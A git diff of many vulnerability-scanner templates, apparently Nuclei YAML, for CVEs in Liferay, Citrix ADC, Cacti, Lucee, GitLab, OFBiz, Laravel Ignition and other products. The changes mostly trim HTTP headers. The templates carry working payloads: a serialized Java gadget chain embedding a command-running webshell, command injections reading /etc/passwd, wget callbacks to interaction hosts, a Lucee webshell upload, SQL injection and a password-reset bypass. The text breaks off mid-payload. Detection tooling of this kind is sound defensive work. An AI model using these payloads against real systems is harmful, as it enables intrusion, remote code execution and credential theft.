C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D
|
||||
|
@ -39,8 +33,7 @@ requests:
|
|||
regex:
|
||||
- "OS Name:.*Microsoft Windows"
|
||||
- "Distributor ID:"
|
||||
condition: or
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -14,23 +14,18 @@ requests:
|
|||
- |
|
||||
POST /menu/stapp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Length: 96
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
X-NITRO-USER: xpyZxwy6
|
||||
|
||||
sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</title><script>alert(31337)</script>"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -15,7 +15,6 @@ requests:
|
|||
- |
|
||||
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Content-Type: application/xml
|
||||
X-NITRO-USER: xpyZxwy6
|
||||
X-NITRO-PASS: xWXHUJ56
|
||||
|
@ -25,30 +24,18 @@ requests:
|
|||
- |
|
||||
GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: python-requests/2.24.0
|
||||
Accept: */*
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
GET /menu/neo HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: python-requests/2.24.0
|
||||
Accept: */*
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
GET /menu/stc HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: python-requests/2.24.0
|
||||
Accept: */*
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: python-requests/2.24.0
|
||||
Accept: */*
|
||||
Connection: close
|
||||
Content-Type: application/xml
|
||||
X-NITRO-USER: oY39DXzQ
|
||||
X-NITRO-PASS: ZuU9Y9c1
|
||||
|
@ -59,9 +46,6 @@ requests:
|
|||
- |
|
||||
POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: python-requests/2.24.0
|
||||
Accept: */*
|
||||
Connection: close
|
||||
Content-Type: application/xml
|
||||
X-NITRO-USER: oY39DXzQ
|
||||
X-NITRO-PASS: ZuU9Y9c1
|
||||
|
@ -70,20 +54,14 @@ requests:
|
|||
<clipermission></clipermission>
|
||||
|
||||
cookie-reuse: true
|
||||
|
||||
# Using cookie-reuse to maintain session between each request, same as browser.
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: randkey
|
||||
name: randkey # dynamic variable
|
||||
part: body
|
||||
internal: true
|
||||
regex:
|
||||
- "(?m)[0-9]{3,10}\\.[0-9]+"
|
||||
|
||||
# Using rand_key as dynamic variable to make use of extractors at run time.
|
||||
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
|
|
|
@ -5,23 +5,15 @@ info:
|
|||
author: dwisiswant0
|
||||
severity: high
|
||||
tags: cve,cve2020,citrix
|
||||
description: |
|
||||
Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download.
|
||||
reference:
|
||||
- https://support.citrix.com/article/CTX276688
|
||||
description: Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download.
|
||||
reference: https://support.citrix.com/article/CTX276688
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Cookie: startupapp=st
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -29,10 +21,12 @@ requests:
|
|||
words:
|
||||
- "<jnlp codebase=\"nonexistent.1337\">"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/x-java-jnlp-file"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -15,9 +15,6 @@ requests:
|
|||
- |
|
||||
POST /cgi-bin/mainfunction.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: */*
|
||||
Connection: close
|
||||
|
||||
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
|
||||
|
||||
|
|
|
@ -14,10 +14,6 @@ requests:
|
|||
- |
|
||||
GET /graph_realtime.php?action=init HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: python-requests/2.18.4
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Connection: keep-alive
|
||||
Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}}
|
||||
|
||||
matchers:
|
||||
|
|
|
@ -12,8 +12,6 @@ requests:
|
|||
path:
|
||||
- "{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2"
|
||||
- "{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"
|
||||
headers:
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -21,9 +21,7 @@ requests:
|
|||
- |
|
||||
POST /storfs-asup HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: */*
|
||||
Content-Length: 78
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`
|
||||
|
|
|
@ -24,11 +24,7 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Cookie: lang=8; url=ping.html; mobile=false;
|
||||
Referer: {{BaseURL}}/info.html
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 178
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -16,24 +16,13 @@ requests:
|
|||
- |
|
||||
POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 8
|
||||
|
||||
imgSrc=a
|
||||
- |
|
||||
POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 790
|
||||
|
||||
imgSrc=
|
||||
<cfoutput>
|
||||
|
@ -62,13 +51,11 @@ requests:
|
|||
</pre>
|
||||
</cfif>
|
||||
</cfoutput>
|
||||
|
||||
- |
|
||||
POST /lucee/{{randstr}}.cfm HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
cmd=id&opts=&timeout=5
|
||||
|
|
|
@ -18,7 +18,6 @@ requests:
|
|||
- |
|
||||
POST /wp-json/buddypress/v1/signup HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
|
||||
Content-Type: application/json; charset=UTF-8
|
||||
|
||||
{
|
||||
|
|
|
@ -14,7 +14,6 @@ requests:
|
|||
POST /casa/nodes/thumbprints HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json;charset=UTF-8
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
|
||||
|
||||
["127.0.0.1:443/ui/"]
|
||||
|
||||
|
|
|
@ -19,8 +19,6 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Content-Type: application/json
|
||||
Content-Length: 86
|
||||
Connection: close
|
||||
|
||||
{"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}
|
||||
|
||||
|
|
|
@ -16,10 +16,8 @@ requests:
|
|||
- |
|
||||
POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
|
||||
Referer: {{BaseURL}}
|
||||
content-type: application/json
|
||||
Connection: close
|
||||
|
||||
{"content": "include:\n remote: http://{{interactsh-url}}/api/v1/targets?test.yml"}
|
||||
|
||||
|
|
|
@ -17,7 +17,6 @@ requests:
|
|||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Content-Length: 47
|
||||
|
||||
action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -
|
||||
|
||||
|
|
|
@ -13,13 +13,7 @@ requests:
|
|||
- |
|
||||
POST /run HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Content-Type: application/json
|
||||
Content-Length: 173
|
||||
Connection: close
|
||||
|
||||
{"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"}
|
||||
|
||||
|
|
|
@ -15,10 +15,7 @@ requests:
|
|||
- |
|
||||
POST /druid/indexer/v1/sampler HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Content-Type: application/json
|
||||
Content-Length: 1006
|
||||
Connection: close
|
||||
|
||||
{
|
||||
"type":"index",
|
||||
|
|
|
@ -19,42 +19,38 @@ requests:
|
|||
- |
|
||||
POST /webtools/control/SOAPService HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
|
||||
Connection: close
|
||||
Content-Type: application/xml
|
||||
Content-Length: 910
|
||||
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
<soapenv:Header/>
|
||||
<soapenv:Body>
|
||||
<ser>
|
||||
<map-HashMap>
|
||||
<map-Entry>
|
||||
<map-Key>
|
||||
<cus-obj>bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a</cus-obj>
|
||||
</map-Key>
|
||||
<map-Value>
|
||||
<std-String value="http://t53lq9.dnslog.cn/"></std-String>
|
||||
</map-Value>
|
||||
</map-Entry>
|
||||
</map-HashMap>
|
||||
</ser>
|
||||
</soapenv:Body>
|
||||
<soapenv:Envelope
|
||||
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
<soapenv:Header/>
|
||||
<soapenv:Body>
|
||||
<ser>
|
||||
<map-HashMap>
|
||||
<map-Entry>
|
||||
<map-Key>
|
||||
<cus-obj>bcc62005737220116a6176612e7574696c2e486173684d617005070c341c16606403200246200a6c6f6164466163746f724920097468726573686f6c6478703f4020202020200c770820202010202020017372200c6a6176612e6e65742e55524cfb2537361a7fa37203200749200868617368436f6465492004706f72744c2009617574686f726974797420124c6a6176612f6c616e672f537472696e673b4c200466696c6571207e20034c2004686f737471207e20034c200870726f746f636f6c71207e20034c200372656671207e20037870a0a0a0a0a0a0a0a07420107435336c71392e646e736c6f672e636e7420012f71207e2005742004687474707078742018687474703a2f2f7435336c71392e646e736c6f672e636e2f780a</cus-obj>
|
||||
</map-Key>
|
||||
<map-Value>
|
||||
<std-String value="http://t53lq9.dnslog.cn/"></std-String>
|
||||
</map-Value>
|
||||
</map-Entry>
|
||||
</map-HashMap>
|
||||
</ser>
|
||||
</soapenv:Body>
|
||||
</soapenv:Envelope>
|
||||
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "OFBiz.Visitor="
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "deserializing"
|
||||
|
|
|
@ -16,18 +16,11 @@ requests:
|
|||
GET /assets/app/something/services/AppModule.class/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
|
||||
- |
|
||||
GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
|
|
|
@ -4,8 +4,7 @@ info:
|
|||
name: Hongdian Sensitive Information
|
||||
author: gy741
|
||||
severity: medium
|
||||
description: |
|
||||
Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi.
|
||||
description: Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi.
|
||||
reference:
|
||||
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-28150
|
||||
|
@ -16,26 +15,12 @@ requests:
|
|||
- |
|
||||
GET /backup2.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cache-Control: max-age=0
|
||||
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
GET /backup2.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cache-Control: max-age=0
|
||||
Authorization: Basic YWRtaW46YWRtaW4=
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
|
||||
Connection: close
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -16,36 +16,18 @@ requests:
|
|||
- |
|
||||
POST /tools.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 85
|
||||
Cache-Control: max-age=0
|
||||
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: {{BaseURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Referer: http://{{Hostname}}/tools.cgi
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
|
||||
Connection: close
|
||||
Referer: {{BaseURL}}/tools.cgi
|
||||
|
||||
op_type=ping&destination=%3Bid
|
||||
|
||||
- |
|
||||
POST /tools.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 85
|
||||
Cache-Control: max-age=0
|
||||
Authorization: Basic YWRtaW46YWRtaW4=
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: {{BaseURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Referer: http://{{Hostname}}/tools.cgi
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
|
||||
Connection: close
|
||||
Referer: {{BaseURL}}/tools.cgi
|
||||
|
||||
op_type=ping&destination=%3Bid
|
||||
|
||||
|
|
|
@ -14,21 +14,15 @@ requests:
|
|||
- |
|
||||
PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Language: en
|
||||
Accept: */*
|
||||
Content-Length: 23
|
||||
Content-Type: application/json
|
||||
Connection: close
|
||||
|
||||
{"Password":"{{randstr}}"}
|
||||
|
||||
- |
|
||||
POST /redfish/v1/SessionService/Sessions/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Language: en
|
||||
Content-Length: 50
|
||||
Content-Type: application/json
|
||||
Connection: close
|
||||
|
||||
{"UserName":"Administrator","Password":"{{randstr}}"}
|
||||
|
||||
|
|
|
@ -14,11 +14,7 @@ requests:
|
|||
POST /index.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 35
|
||||
|
||||
SPOOLDIR=test".system(id)."&recheck=Recheck
|
||||
|
||||
|
|
|
@ -15,10 +15,7 @@ requests:
|
|||
- |
|
||||
POST /_ignition/execute-solution HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: deflate
|
||||
Accept: application/json
|
||||
Connection: close
|
||||
Content-Length: 144
|
||||
Content-Type: application/json
|
||||
|
||||
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
|
||||
|
@ -26,10 +23,7 @@ requests:
|
|||
- |
|
||||
POST /_ignition/execute-solution HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: deflate
|
||||
Accept: application/json
|
||||
Connection: close
|
||||
Content-Length: 144
|
||||
Content-Type: application/json
|
||||
|
||||
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
|
||||
|
@ -37,10 +31,7 @@ requests:
|
|||
- |
|
||||
POST /_ignition/execute-solution HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: deflate
|
||||
Accept: application/json
|
||||
Connection: close
|
||||
Content-Length: 144
|
||||
Content-Type: application/json
|
||||
|
||||
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}}
|
||||
|
@ -48,10 +39,7 @@ requests:
|
|||
- |
|
||||
POST /_ignition/execute-solution HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: deflate
|
||||
Accept: application/json
|
||||
Connection: close
|
||||
Content-Length: 144
|
||||
Content-Type: application/json
|
||||
|
||||
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=0